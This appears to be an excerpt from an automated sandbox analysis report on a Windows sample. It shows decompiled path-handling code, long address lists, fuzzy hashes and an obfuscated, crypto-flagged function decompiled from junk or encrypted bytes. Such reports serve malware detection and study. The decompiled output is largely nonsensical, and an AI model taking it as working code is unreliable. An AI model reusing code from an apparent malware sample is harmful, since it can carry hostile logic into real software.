																		_t446 = _t425 & 0x0000ffff;
																		_v64 = _t446;
																		goto L58;
																	}
																	_t422 = _t422 - 1;
																	_v96 = _t422;
																	_t360 =  *(_t386 + _t422 * 2) & 0x0000ffff;
																	if(_t360 == 0x20) {
																		goto L51;
																	}
																	if(_t360 == 0x2e) {
																		goto L51;
																	}
																	_t422 = _t422 + 1;
																	_v96 = _t422;
																	goto L56;
																} else {
																	L51:
																	 *(_t386 + _t422 * 2) = 0;
																	goto L52;
																}
																L69:
																if( *((short*)(_t386 + _t420 * 2)) == 0x2f) {
																	 *((short*)(_t386 + _t420 * 2)) = 0x5c;
																}
																_t420 = _t420 + 1;
																_v100 = _t420;
																_t352 = _v56;
																goto L28;
															}
															_t446 = _t417 & 0x0000ffff;
															_v64 = _t446;
															_t439 = _v92;
															goto L58;
														}
														if(_v116 > 8) {
															goto L26;
														}
														_t446 = 0xa;
														_v64 = 0xa;
														_t439 = _v92;
														goto L58;
													}
													L72:
													if(_t415 > 0xffff) {
														_t446 = 0;
													}
													_v64 = _t446;
													_t439 = _v92;
													goto L58;
												}
												L26:
												_t352 = _v56;
												goto L27;
											}
										}
										_t379 = _t336[2] & 0x0000ffff;
										if(_t379 != 0x5c) {
											if(_t379 == 0x2f) {
												goto L22;
											}
											goto L98;
										}
										L22:
										_t337 = 2;
									}
									goto L23;
								}
								_t450 =  *_t336 & 0x0000ffff;
								if(_t450 == 0x5c || _t450 == 0x2f) {
									if(_t407 < 4) {
										L132:
										_t337 = 4;
										goto L23;
									}
									_t451 = _t336[1] & 0x0000ffff;
									if(_t451 != 0x5c) {
										if(_t451 == 0x2f) {
											goto L87;
										}
										goto L132;
									}
									L87:
									if(_t407 < 6) {
										L135:
										_t337 = 1;
										goto L23;
									}
									_t452 = _t336[2] & 0x0000ffff;
									if(_t452 != 0x2e) {
										if(_t452 == 0x3f) {
											goto L89;
										}
										goto L135;
									}
									L89:
									if(_t407 < 8) {
										L134:
										_t337 = ((0 | _t407 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
										goto L23;
									}
									_t384 = _t336[3] & 0x0000ffff;
									if(_t384 != 0x5c) {
										if(_t384 == 0x2f) {
											goto L91;
										}
										goto L134;
									}
									L91:
									_t337 = 6;
									goto L23;
								} else {
									goto L17;
								}
							}
						}
					}
					goto L124;
				}
			}

0x01a06e30
0x01a06e35
0x01a06e37
0x01a06e3c
0x01a06e47
0x01a06e4b
0x01a06e50
0x01a06e53
0x01a06e55
0x01a06e5b
0x01a06e5f
0x01a06e65
0x01a06e68
0x01a06e6a
0x01a06e6d
0x01a06e70
0x01a06e73
0x01a06e76
0x01a06e79
0x01a06e7c
0x01a06e7f
0x01a06e84
0x01a0710f
0x01a0710f
0x01a06e8c
0x01a06e8e
0x01a06e8e
0x01a06e97
0x01a4f5d3
0x01a4f5d3
0x01a06e9d
0x01a06ea3
0x01a06eaa
0x01a06ead
0x01a06eb2
0x01a06eb4
0x01a06eb7
0x01a07466
0x01a07466
0x00000000
0x01a06ebd
0x01a06ebd
0x01a06ec4
0x01a06eca
0x01a06ecc
0x01a06ecf
0x01a06ed2
0x01a06ede
0x01a4f5df
0x01a4f5e0
0x00000000
0x01a4f5e0
0x01a06ee6
0x00000000
0x00000000
0x01a06eec
0x01a06ef3
0x01a07181
0x01a06f02
0x01a06f02
0x01a06f02
0x01a06f0b
0x01a06f0d
0x01a06f10
0x01a06f17
0x01a06f21
0x01a06f24
0x01a06f2d
0x01a06f31
0x01a06f36
0x01a06f3d
0x01a07413
0x01a07416
0x01a07419
0x01a0741c
0x01a07421
0x01a0742b
0x01a0742b
0x01a0742e
0x01a07439
0x01a4f60b
0x01a4f60b
0x01a4f615
0x01a4f619
0x01a0743f
0x01a07447
0x01a07454
0x01a0745a
0x01a0745f
0x01a0745f
0x00000000
0x01a07439
0x01a07425
0x01a4f5e9
0x01a4f5ed
0x01a4f5f4
0x00000000
0x00000000
0x01a4f5fd
0x00000000
0x00000000
0x01a4f603
0x01a4f603
0x00000000
0x01a06f43
0x01a06f43
0x01a06f45
0x01a06f48
0x01a06f4e
0x01a06f65
0x01a06f68
0x01a0721f
0x01a06f83
0x01a06f86
0x01a072dc
0x01a072dc
0x01a06f9e
0x01a06fa1
0x01a06fa3
0x01a06fa5
0x01a06fa8
0x01a06fab
0x01a06fae
0x01a06fb1
0x01a06fb4
0x01a06fb6
0x01a06fb9
0x01a06fbf
0x01a0718a
0x01a0718e
0x01a4f831
0x01a4f831
0x01a4f833
0x01a4f836
0x00000000
0x01a4f836
0x01a07194
0x00000000
0x01a4f658
0x01a4f658
0x01a4f65a
0x01a4f65d
0x01a4f662
0x01a4f662
0x01a4f665
0x01a4f667
0x00000000
0x00000000
0x01a4f669
0x01a4f66c
0x01a4f670
0x01a4f673
0x01a4f67a
0x01a4f67a
0x01a4f67b
0x01a4f67e
0x01a4f681
0x00000000
0x00000000
0x01a4f683
0x01a4f683
0x00000000
0x01a4f683
0x01a4f675
0x01a4f678
0x00000000
0x00000000
0x00000000
0x01a4f678
0x01a4f686
0x01a4f688
0x01a4f68b
0x01a4f68e
0x01a4f691
0x01a4f694
0x01a4f698
0x01a4f69c
0x01a4f6a0
0x00000000
0x00000000
0x00000000
0x00000000
0x01a07397
0x01a0739c
0x01a0739f
0x01a073a3
0x01a073a5
0x01a4f6bb
0x01a4f6c1
0x01a4f6c4
0x01a073ab
0x01a073ab
0x01a073ab
0x01a073b1
0x01a073b5
0x01a073ba
0x01a073c0
0x01a073c3
0x01a073c7
0x01a073cc
0x01a073d0
0x01a073d3
0x01a4f6cc
0x01a4f6d4
0x01a4f6d9
0x01a4f6dd
0x01a4f6e1
0x01a4f6e5
0x01a4f6f0
0x01a4f6fc
0x01a4f700
0x01a4f709
0x01a4f70e
0x01a4f710
0x01a4f784
0x01a4f788
0x01a4f78b
0x01a4f78e
0x01a4f790
0x01a4f792
0x01a4f795
0x01a4f798
0x01a4f7b7
0x01a4f7b7
0x01a4f7ba
0x01a4f7ba
0x00000000
0x01a4f7ba
0x01a4f79a
0x01a4f79d
0x00000000
0x00000000
0x01a4f79f
0x01a4f7a4
0x01a4f7a7
0x01a4f7ab
0x01a4f7ae
0x01a4f7b1
0x00000000
0x01a4f7b1
0x01a4f712
0x01a4f717
0x01a4f74c
0x01a4f74e
0x01a4f752
0x01a4f756
0x01a4f75d
0x01a4f761
0x01a4f764
0x01a4f76c
0x01a4f771
0x01a4f775
0x01a4f778
0x01a4f77c
0x00000000
0x01a4f77c
0x01a4f719
0x01a4f71d
0x01a4f720
0x01a4f723
0x01a4f726
0x01a4f729
0x01a4f72e
0x01a4f740
0x01a4f744
0x00000000
0x01a4f744
0x01a4f730
0x01a4f732
0x01a4f735
0x01a4f738
0x00000000
0x01a073d9
0x01a073d9
0x01a073db
0x01a073de
0x01a073e1
0x01a073e4
0x01a073e7
0x01a073ea
0x01a073ef
0x01a073f2
0x01a073f6
0x01a073f9
0x01a073f9
0x01a073fe
0x01a07401
0x01a07406
0x01a07409
0x00000000
0x01a07409
0x00000000
0x01a4f7c5
0x01a4f7ca
0x01a4f7cd
0x01a4f7d1
0x01a4f7d3
0x01a4f7da
0x01a4f7e0
0x01a4f7e3
0x01a4f7e3
0x01a4f7e6
0x01a4f7d5
0x01a4f7d5
0x01a4f7d5
0x01a4f7e9
0x01a4f7eb
0x01a4f7f0
0x01a4f7f3
0x01a4f7f5
0x01a4f7f8
0x01a4f7fb
0x01a4f7fe
0x01a4f801
0x01a4f80f
0x01a4f814
0x01a4f803
0x01a4f803
0x01a4f806
0x01a4f806
0x00000000
0x00000000
0x01a0719d
0x01a071a2
0x01a071a5
0x01a071a9
0x01a071ab
0x01a4f826
0x01a4f829
0x01a071b1
0x01a071b1
0x01a071ba
0x01a071ba
0x01a071bf
0x01a071c5
0x01a071cf
0x01a071d2
0x01a071d8
0x01a071dd
0x01a071e4
0x01a071e7
0x00000000
0x00000000
0x01a07275
0x01a0727a
0x01a0727d
0x01a0727f
0x01a07282
0x01a07284
0x01a4f6a8
0x01a4f6aa
0x01a4f6aa
0x01a0728a
0x01a0728f
0x01a07292
0x01a07297
0x01a0729a
0x01a0729d
0x01a072a0
0x01a072a5
0x01a072a9
0x01a072ac
0x01a072af
0x01a072b2
0x01a072b5
0x01a072b7
0x01a072ba
0x01a072be
0x01a072be
0x01a072c2
0x01a072c5
0x01a072c8
0x01a4f6b2
0x01a4f6b2
0x00000000
0x00000000
0x01a06fc5
0x01a06fc5
0x01a06fcc
0x01a06fd8
0x01a06fda
0x01a06fdd
0x01a06fe3
0x01a07162
0x01a4f845
0x00000000
0x00000000
0x01a4f84e
0x01a4f8c4
0x01a4f8c8
0x01a4f8cb
0x01a4f8ce
0x01a070e0
0x01a070e0
0x01a070e3
0x01a070e3
0x01a070ea
0x01a070ef
0x01a070f1
0x01a070f4
0x01a070fc
0x01a070fd
0x01a070fe
0x01a0710c
0x01a0710c
0x01a4f850
0x01a4f858
0x01a4f87a
0x01a4f88a
0x01a4f88d
0x01a4f890
0x01a4f893
0x01a4f895
0x01a4f898
0x01a4f8a4
0x01a4f8ad
0x01a4f8b0
0x01a4f8b3
0x01a4f8b3
0x01a4f8a4
0x01a06fec
0x01a06fec
0x01a06fee
0x00000000
0x01a06ff1
0x01a06ff8
0x00000000
0x01a06ffe
0x01a07004
0x01a07006
0x01a07006
0x01a07010
0x01a07017
0x01a0701e
0x01a07072
0x01a07074
0x01a0707e
0x01a07083
0x01a07087
0x01a07088
0x01a0706c
0x01a0706c
0x01a0706d
0x00000000
0x01a0706d
0x01a0707c
0x00000000
0x00000000
0x00000000
0x01a0707c
0x01a07020
0x01a07023
0x01a071ef
0x01a071ef
0x01a071f2
0x01a071f7
0x00000000
0x00000000
0x01a071fd
0x01a07200
0x01a07205
0x01a0720b
0x01a0720e
0x01a072eb
0x00000000
0x00000000
0x01a072f6
0x00000000
0x01a07030
0x01a07037
0x01a0703e
0x01a07055
0x01a0705a
0x01a07062
0x01a4f908
0x01a4f90e
0x01a4f90f
0x01a4f90f
0x01a4f908
0x01a07062
0x01a0705a
0x00000000
0x01a07045
0x01a07045
0x01a07049
0x01a0704a
0x01a0704d
0x01a0704e
0x00000000
0x01a0704e
0x01a0703e
0x01a07068
0x01a07069
0x00000000
0x01a07069
0x01a072fc
0x01a07301
0x01a07304
0x01a07314
0x01a07314
0x01a07319
0x00000000
0x00000000
0x01a07325
0x01a0732d
0x01a07330
0x01a07356
0x01a07357
0x00000000
0x00000000
0x00000000
0x00000000
0x01a07332
0x01a07332
0x01a07337
0x00000000
0x00000000
0x01a07343
0x01a0734b
0x01a0734e
0x01a07361
0x00000000
0x00000000
0x01a07367
0x01a07367
0x01a07368
0x00000000
0x01a07368
0x01a07350
0x01a07351
0x01a07351
0x00000000
0x01a07332
0x01a4f8f9
0x01a4f8f9
0x01a4f8fa
0x00000000
0x01a4f8fa
0x01a07306
0x01a0730e
0x01a4f8ee
0x00000000
0x00000000
0x01a4f8f4
0x00000000
0x01a0730e
0x01a07214
0x01a07214
0x01a07217
0x00000000
0x01a07217
0x01a0702c
0x00000000
0x00000000
0x00000000
0x00000000
0x01a0702c
0x01a0708d
0x01a07094
0x01a07098
0x01a070a0
0x01a0738c
0x01a0738d
0x01a0738d
0x01a070a0
0x01a07098
0x01a070a6
0x01a070ab
0x01a070b3
0x01a070b5
0x01a070cd
0x01a070cd
0x01a070d0
0x01a070d8
0x01a0711a
0x01a0711c
0x01a0711c
0x01a07121
0x00000000
0x00000000
0x01a07129
0x00000000
0x00000000
0x01a0712b
0x01a0712b
0x01a07130
0x01a0737e
0x01a07381
0x00000000
0x01a07381
0x01a07138
0x00000000
0x00000000
0x01a07144
0x01a07144
0x01a070da
0x01a070da
0x01a070dd
0x00000000
0x01a070dd
0x01a070b7
0x01a070b8
0x01a070bb
0x01a070c2
0x00000000
0x00000000
0x01a070c7
0x00000000
0x00000000
0x01a070c9
0x01a070ca
0x00000000
0x01a070ad
0x01a070ad
0x01a070af
0x00000000
0x01a070af
0x01a07148
0x01a0714d
0x01a4f8e2
0x01a4f8e2
0x01a07153
0x01a07154
0x01a07157
0x00000000
0x01a07157
0x01a4f87c
0x01a4f87f
0x01a4f882
0x00000000
0x01a4f882
0x01a4f85e
0x00000000
0x00000000
0x01a4f864
0x01a4f869
0x01a4f86c
0x00000000
0x01a4f86c
0x01a07168
0x01a07170
0x01a4f8d6
0x01a4f8d6
0x01a07176
0x01a07179
0x00000000
0x01a07179
0x01a06fe9
0x01a06fe9
0x00000000
0x01a06fe9
0x01a06fbf
0x01a06f8c
0x01a06f93
0x01a072d6
0x00000000
0x00000000
0x00000000
0x01a072d6
0x01a06f99
0x01a06f99
0x01a06f99
0x00000000
0x01a06f68
0x01a06f50
0x01a06f56
0x01a0722c
0x01a4f629
0x01a4f629
0x00000000
0x01a4f629
0x01a07232
0x01a07239
0x01a4f623
0x00000000
0x00000000
0x00000000
0x01a4f623
0x01a0723f
0x01a07242
0x01a4f64e
0x01a4f64e
0x00000000
0x01a4f64e
0x01a07248
0x01a0724f
0x01a07373
0x00000000
0x00000000
0x00000000
0x01a07379
0x01a07255
0x01a07258
0x01a4f63c
0x01a4f648
0x00000000
0x01a4f648
0x01a0725e
0x01a07265
0x01a4f636
0x00000000
0x00000000
0x00000000
0x01a4f636
0x01a0726b
0x01a0726b
0x00000000
0x00000000
0x00000000
0x00000000
0x01a06f56
0x01a06f3d
0x01a06ed2
0x00000000
0x01a06ec4

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b01e0b6c7acebe2a38926e3aef8cf18fde2bc3221364a9e76ed793e82e0840f
Instruction ID: ac188a44d5040b96fab2f6372f0c0d4a8a9e5b7c3e46f8632c33b0efa965467d
Opcode Fuzzy Hash: 6b01e0b6c7acebe2a38926e3aef8cf18fde2bc3221364a9e76ed793e82e0840f
Instruction Fuzzy Hash: EE02B074D00214CFDB2ACFDDE480AADBBB1EF44710F55412EE996AB2D1E770A891CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0041B5D3, Relevance: .5, Instructions: 455
COMMONCrypto

Download Yara Rule

C-Code - Quality: 47%

			E0041B5D3(void* __eax, void* __ecx, void* __edx, void* __edi) {
				signed int _t56;
				signed char _t57;
				signed char _t58;
				signed char _t59;
				signed int _t75;
				signed char _t76;
				signed int _t80;
				char _t81;
				signed char _t82;
				signed char _t85;
				signed int _t89;
				void* _t90;
				intOrPtr _t92;
				void* _t93;
				signed int _t98;

				asm("sbb eax, 0x2b4ee8e9");
				asm("adc [0xee5bb2c4], esi");
				asm("cmpsw");
				asm("adc edi, [0x92e323d4]");
				asm("adc edi, [0xcd328fd5]");
				 *0xd28eb583 =  *0xd28eb583 >> 0x2d;
				 *0x346e5e07 =  *0x346e5e07 >> 0xa2;
				_push(_t90 + 0x2a6486ec);
				asm("adc ebp, [0x56eff9fa]");
				asm("rol dword [0x4979c25], 0xaf");
				_push(0x000000a8 ^  *0x469fc726);
				 *0x1380ee1 =  *0x1380ee1 - __ecx;
				asm("ror dword [0xd30c76c5], 0x5c");
				_t92 =  *0x2e416217;
				_t80 =  *0xfae3569 * 0x0000eb0d ^  *0x3b47220f;
				asm("sbb [0x42807fee], ebx");
				_push(_t80);
				asm("cmpsb");
				asm("rcl dword [0x3e02c564], 0x66");
				_t56 = (__eax + 0x00000001 ^ 0x321506bc) + 1;
				_t81 = _t80 - 2;
				 *0xea669718 = _t81;
				_t82 = _t81 + 1;
				 *0xa628c3f9 =  *0xa628c3f9 >> 0x29;
				asm("rcr byte [0xb09d5e3], 0x35");
				asm("rcr dword [0xb8c0868c], 0x96");
				 *0x42ce311f =  *0x42ce311f & _t56;
				asm("rol dword [0x7fc4219b], 0xe4");
				_t98 = ((0x494eabc5 |  *0xea0e3a09) - 0x00000001 ^ 0xc729e368) - 1;
				_t75 = __ecx + 2 &  *0xc7c060be ^  *0x454ae42a;
				 *0xba3d91bb =  *0xba3d91bb >> 0xbe;
				asm("rol byte [0x4c098aa8], 0x5f");
				asm("rol byte [0x60b2cf1c], 0xd4");
				asm("rcl byte [0xb213ab3], 0x41");
				_t89 =  *0x50ba1b6b * 0x000044e9 ^  *0x26d5f661;
				 *0x2c62df7 = _t82;
				 *0x637fd028 =  *0x637fd028 >> 0xad;
				 *0x5aee0ec5 =  *0x5aee0ec5 ^ _t75;
				_t85 = (_t82 & 0x000000d0) - 1 + 1;
				_t57 = _t56 |  *0x1db93665;
				asm("rcl dword [0x4cfb6c16], 0x10");
				 *0xe305824 = _t57;
				 *0x361d2eb1 =  *0x361d2eb1 >> 0xc6;
				asm("rol byte [0x3236dde7], 0x4b");
				asm("adc [0xad466db], esi");
				_t58 = _t57 ^ 0x000000c9;
				 *0xed0672cc =  *0xed0672cc + _t58;
				_t76 = _t75 ^  *0x7dd8a897;
				L1();
				asm("adc esi, 0xaf124ee8");
				_push(_t92);
				_t93 = _t92 - 1;
				asm("sbb dh, [0x616ecea8]");
				asm("adc [0x661d9f14], al");
				_push( *0x5639c917);
				_t59 = _t58 - 0xd4ee9ed;
				asm("adc ch, [0x6f539d18]");
				if(_t59 >= 0) {
					_push( *0xd34de70);
					asm("cmpsw");
					_push(__eax);
					_push( *0x10b4b896);
					asm("rcr byte [0x3b1be10], 0x9f");
					__ebp = __ebp + 0x886d13df;
					asm("stosd");
					__cl = __cl |  *0x7dfad088;
					__eax = __eax |  *0x78de6c0;
					asm("adc eax, [0x190d84d4]");
					__eflags =  *0x9af24f5 & 0x494eabc5;
					asm("adc ch, 0xc");
					__eax = __eax |  *0x20748f03;
					asm("sbb ecx, [0x21371a99]");
					 *0x96c8ba0a =  *0x96c8ba0a >> 0x85;
					__eflags =  *0x96c8ba0a;
					asm("adc ebx, [0x4abb91c1]");
					__ch = 0x80;
					if( *0x96c8ba0a <= 0) {
						__esp =  *0xa617017f * 0x598a;
						asm("adc [0xb573c9d], esp");
						asm("adc bl, [0x2ea19cb5]");
						__ecx = __ecx +  *0x1c598107;
						_push(__ecx);
						asm("sbb [0x500fe0b9], ebp");
						__eflags = __dh & 0x00000084;
						__bh = __bh & 0x00000002;
						asm("sbb ebx, [0x5b4e1b09]");
						__esi = __esi - 0x7a767a2b;
						 *0xea040224 =  *0xea040224 >> 2;
						asm("sbb esp, 0x6b56e739");
						asm("scasb");
						asm("sbb [0x3fef1ab0], cl");
						asm("adc ecx, 0x79b07089");
						__eflags =  *0x8ad42a25 & __esp;
						 *0xff327a12 =  *0xff327a12 | __dl;
						_push(__ecx);
						__edi = __edi | 0x2e82990d;
						__esp =  *0xfe2b1105;
						__ebx = __ebx + 1;
						__edx = __edx + 0x11276def;
						__esi = __esi - 1;
						__ebx = __ebx - 1;
						__eflags = __ebx;
						_t12 = __ebp;
						__ebp =  *0xef5ab2d5;
						 *0xef5ab2d5 = _t12;
						if(__ebx >= 0) {
							__eflags = __ecx & 0x4071aa78;
							 *0x75651e19 = __ebx;
							_push(__edx);
							 *0x49324e2 =  *0x49324e2 << 0x83;
							asm("sbb ah, [0xe10f00b5]");
							_push(__ebx);
							__eflags =  *0x248be03c & __bl;
							_push(__edi);
							if(( *0x248be03c & __bl) < 0) {
								__esi =  *0xe3bf947d * 0x37a6;
								 *0x841a4d06 =  *0x841a4d06 ^ __ecx;
								__edi = __edi + 1;
								__dl = __dl ^  *0xe4f4a524;
								__eax = __eax - 1;
								__esp = __esp |  *0xd0b77db;
								__esp = __esp +  *0xf42a4d07;
								asm("adc ebp, [0xfbeeb917]");
								asm("movsw");
								 *0x6848dfe3 =  *0x6848dfe3 - __al;
								__ebp = __ebp &  *0xaa4869ba;
								asm("rcl dword [0xb8fabc9a], 0x92");
								asm("sbb [0xc2ff1eef], esi");
								__edi = __edi ^  *0x2c769d85;
								asm("ror byte [0xa585c41a], 0x81");
								__eax = __eax + 1;
								__eflags =  *0x8c69f0ea & __ebp;
								asm("adc ebp, [0x871f7d91]");
								__ch = 0x80 -  *0xcad6cdb3;
								__eflags =  *0xfb01a79b & __esi;
								_push(0xf7fc458f);
								__esp = __esp - 1;
								__eflags = __esi & 0x341211cb;
								__ecx = __ecx | 0x925f7b0e;
								__ebp = __esi;
								__al = __al &  *0x825faee4;
								asm("sbb [0xfb816e82], bh");
								_t23 = __ebx;
								__ebx =  *0xe22a153e;
								 *0xe22a153e = _t23;
								__ebp = __ebp ^  *0x317a186f;
								__eflags =  *0xecf4cdea & __ebx;
								asm("sbb eax, [0xa4fd24a1]");
								asm("adc edx, 0x8502f1a9");
								__eflags = __ecx - 0x2f934cd4;
								__eax = __eax +  *0xdf4906db;
								__dl -  *0x8ef8b510 =  *0x79573a07 - __esi;
								__dh = __dh &  *0x6c8fcc82;
								 *0x102c3ced =  *0x102c3ced ^ __edi;
								 *0xba9c2df8 =  *0xba9c2df8 >> 0xc4;
								__esp = __esp + 1;
								asm("ror dword [0xc3172d15], 0x55");
								 *0x589bae9f =  *0x589bae9f - __edi;
								__edx = __edx - 1;
								 *0x7f441588 =  *0x7f441588 << 0xe;
								 *0xe1c05be & __eax =  *0x52fe3c2 & __esi;
								__bl = 8;
								 *0x2febc910 =  *0x2febc910 - 0xa8;
								 *0xe1303005 =  *0xe1303005 | __edi;
								asm("sbb [0x8c052ff0], ebp");
								asm("cmpsw");
								__ebx = __ebx + 0x52fe497;
								asm("rol dword [0xe293a8c8], 0x1f");
								__eflags =  *0x91c052f & __ebx;
								__dl = __dl - 0xd7;
								__ch = 0x80 -  *0xcad6cdb3 -  *0x69032ff2;
								__eflags = 0x80;
								asm("sbb esi, [0x870418ce]");
								_push(__esp);
								_push( *0x704e036);
								if(0x80 < 0) {
									__edx =  *0x4e0317d * 0x7789;
									__eflags = __edx;
									_push( *0xe204e03b);
									if(__edx > 0) {
										asm("sbb [0x5e03976], ebx");
										 *0xf6dcf823 =  *0xf6dcf823 | __ebx;
										__ebx = 0xf063052f;
										__eax = __eax |  *0x52ff0d3;
										__edx = __edx - 1;
										 *0x2feed216 =  *0x2feed216 >> 0x17;
										__eflags = __esp -  *0x1632b307;
										__ebx = 0xf063052f &  *0xaf5b706e;
										__eflags = 0xf063052f;
										_pop( *0x2425a507);
										if(0xf063052f < 0) {
											__eax = __eax - 0xaf5d6d71;
											__ecx = __ecx & 0xe7f42607;
											 *0xaf57633b =  *0xaf57633b & __ecx;
											__ecx = __ecx | 0x83a9fb07;
											 *0xaf4fa6cc =  *0xaf4fa6cc | __edi;
											 *0x4562f908 =  *0x4562f908 + 0xa8;
											 *0x8a7796e =  *0x8a7796e | __edi;
											asm("sbb [0xb2170899], ecx");
											asm("rcl dword [0x6a3ca392], 0x6e");
											__eflags = 0xf063052f -  *0x750899fa;
											 *0xbeceacfa =  *0xbeceacfa << 0xa3;
											__eax = __eax &  *0x8990fbd;
											__eflags = __eax;
											if(__eax <= 0) {
												__edx = 0x896a5a77;
												__al =  *0x99f65e28;
												__eax = __eax +  *0xb3043809;
												__ebx = __ebx + 0x10ab8dcf;
												__eax = __eax | 0x4f09212f;
												__ebp = __ebp +  *0xdbebd0ee;
												__eflags = __ebp;
												if(__ebp == 0) {
													asm("adc edi, [0x2137137b]");
													__ebx = __ebx |  *0x4a982309;
													 *0xfa67e02e =  *0xfa67e02e & __eax;
													asm("sbb bl, 0x2c");
													__esp = __esp &  *0xb8bf0a21;
													asm("movsw");
													asm("rol dword [0x32df84c4], 0x44");
													_t32 = __esi;
													__esi =  *0xb014635;
													 *0xb014635 = _t32;
													 *0x9d799100 = 0xa8;
													__eflags =  *0xdcae1b3f & 0xf063052f;
													asm("sbb eax, 0x8c5ee65");
													_pop(__ecx);
													 *0xc205f118 = 0x80;
													 *0x11990ebb =  *0x11990ebb ^ __esp;
													__eflags = __esp -  *0x17a6d2d5;
													asm("sbb edx, [0x98aaf01]");
													__edx = 0x896a5a77 &  *0x7d610885;
													__ebx = __ebx &  *0x3aba1f66;
													__edx = (0x896a5a77 &  *0x7d610885) -  *0x92a51429;
													asm("adc edx, 0x76529e61");
													asm("adc ebp, [0xeb28c6d9]");
													__esp = __esp |  *0x58dfb6f3;
													__eflags = __edi & 0xe5384f9c;
													__dh = __dh +  *0x5a12b1e4;
													__eflags = __edi - 0x6ed5c73d;
													_t37 = __ebx;
													__ebx =  *0xdec8a0f8;
													 *0xdec8a0f8 = _t37;
													asm("sbb [0x3c628c05], edi");
													__eax = __eax ^  *0xf62796f7;
													__esi =  *0xb014635 - 1;
													 *0x7eaad30b = __esi;
													 *0xc19b708e =  *0xc19b708e - __ebp;
													__eflags = __esi - 0xc5fbd5f7;
													asm("sbb [0x5db0b206], ecx");
													 *0xc9a43c6 =  *0xc9a43c6 << 0xed;
													__eflags =  *0xc9a43c6;
													asm("movsw");
													__esp = __esp - 1;
													_push( *0x56efa9bc);
													if( *0xc9a43c6 < 0) {
														__edx =  *0x4b3ad87d * 0x73e;
														__eflags = __edx;
														if(__edx >= 0) {
															__esp = __esp ^  *0x44235678;
															 *0x16af1827 =  *0x16af1827 << 0x67;
															_pop(__ebp);
															asm("cmpsw");
															__eflags = __edi -  *0x3ac713df;
															asm("sbb [0x96f5a01e], esp");
															__eflags =  *0xa04aecca & __ah;
															__esi = __esi |  *0x63ecf5f8;
															asm("adc al, [0xc0dbc6ca]");
															asm("adc [0x709c0511], edx");
															__eax = __eax & 0x6500868e;
															__eax = __eax + 1;
															__edi = __edi & 0x2f8970f7;
															__bl = 0x00000008 ^  *0xff7f7ef6;
															__edi = __edi -  *0x3b11c29;
															__eflags = __edi;
															if(__eflags == 0) {
																asm("sbb ebp, [0x18a6d97b]");
																if(__eflags >= 0) {
																	__edx = __edx ^  *0x385e2e72;
																	asm("rol dword [0x5b22a683], 0xb4");
																	asm("rcl byte [0x76cb5763], 0xd1");
																	__esp = __esp - 1;
																	__bh = __bh ^ 0x00000022;
																	__esi = __esi - 1;
																	__ebx = __ebx ^  *0x68bfec3d;
																	__eflags = __ebx;
																	__ebp =  *0x10797287;
																	if(__ebx <= 0) {
																		 *0x5f496377 =  *0x5f496377 >> 0x15;
																		__eax = __eax + 1;
																		__eflags = __eax;
																		if(__eax >= 0) {
																			_t40 = __eax;
																			__eax =  *0x25d7a572;
																			 *0x25d7a572 = _t40;
																			__edi = __edi - 1;
																			 *0xe3e2c2a1 =  *0xe3e2c2a1 >> 0x59;
																			__cl = __cl -  *0x89228da0;
																			__ecx = __ecx |  *0xa4cb851b;
																			__bh =  *0xe6ba8af2;
																			asm("sbb [0xd402a60b], eax");
																			__ecx =  *0xd9f5866a * 0x9343;
																			asm("ror dword [0xfe41b4d4], 0x25");
																			asm("adc edi, 0x1ef2631f");
																			__edx = __edx ^  *0xb6785461;
																			__bh =  *0xe6ba8af2 - 0xb5;
																			__ecx = 1 +  *0xd9f5866a * 0x9343;
																			asm("rcr byte [0x9129cf34], 0x7c");
																			__eflags =  *0x98b61905 & __ebx;
																			__ebx = __ebx + 1;
																			 *0x3d8ff81f =  *0x3d8ff81f >> 0x8f;
																			__edx = __esi;
																			 *0x58ffc33b =  *0x58ffc33b & __ecx;
																			asm("sbb edi, [0xfe2915c2]");
																			 *0x92f53465 = __eax;
																			asm("sbb dl, [0x8b28d4b7]");
																			__ecx = __ecx -  *0xfcbd596c;
																			__ecx =  *0x3b01afce;
																			asm("rcl dword [0x55f732cd], 0x3f");
																			__esi = __esi + 1;
																			_push(__ebp);
																			asm("adc ebx, [0x2212a86d]");
																			__eflags =  *0x73f8308c & __ecx;
																			 *0xbfd2090e = __ecx;
																			_t45 = __esp;
																			__esp =  *0xa56ca105;
																			 *0xa56ca105 = _t45;
																			__eflags =  *0xb704dfd7 - __dl;
																			__ebp = __ebp -  *0x11301efb;
																			asm("ror byte [0xa39cf618], 0x8e");
																			__eflags = __ebp -  *0x7fab5b3d;
																			__ecx = __ecx |  *0x4cafa1db;
																			__eflags = __ecx;
																			if(__ecx > 0) {
																				__esp =  *0xf4baa47e * 0x1929;
																				asm("sbb esi, [0x11af890f]");
																				 *0x7145dfdc =  *0x7145dfdc << 0x2d;
																				_t46 = __ebp;
																				__ebp =  *0x56a63d96;
																				 *0x56a63d96 = _t46;
																				asm("sbb ecx, 0x404c8381");
																				__eax = __eax - 1;
																				asm("ror byte [0xd5786984], 0x63");
																				asm("ror dword [0xdff620cf], 0xbc");
																				__ecx = 0xd9630129;
																				__ebx = __ebx + 1;
																				_push( *0xc33771ee);
																				__esp =  *0x3d139a60 * 0xf063;
																				asm("ror byte [0x1a8013e2], 0xb5");
																				0xc5bfcceb = 0xc5bfcceb |  *0x8e9597bf;
																				asm("sbb esp, 0xe2b93305");
																				__bl = __bl +  *0x4fec1180;
																				 *0x83abeeca =  *0x83abeeca << 0x5a;
																				 *0x8b9356d = __esp;
																				__eflags = __esp -  *0x4e21768c;
																				__ecx =  *0x990da86a * 0xf70d;
																				__eflags = __esi -  *0x26301961;
																				asm("sbb edi, [0xe74cdd15]");
																				__eax = (0xc5bfcceb |  *0x8e9597bf) + 1;
																				__ebx = __ebx |  *0x1cb4bb9a;
																				__ebx = __ebx ^  *0x623a466f;
																				__eflags = __ebx;
																				_pop(__eax);
																				if(__ebx <= 0) {
																					goto L1;
																				} else {
																					__edi = 0x9dc6d876;
																					asm("adc ebx, 0x2314f2be");
																					__ebx = __ebx -  *0xdf097af3;
																					__eflags = 0xc5bfcceb -  *0x91c88ca3;
																					asm("rol dword [0xdfb5d2f5], 0x7a");
																					 *0xb79f0e7 =  *0xb79f0e7 << 0xfe;
																					_pop(__ebx);
																					asm("adc ebp, [0x949f6fc]");
																					asm("adc dl, [0x6803ccf2]");
																					_pop( *0x1f0fc5ed);
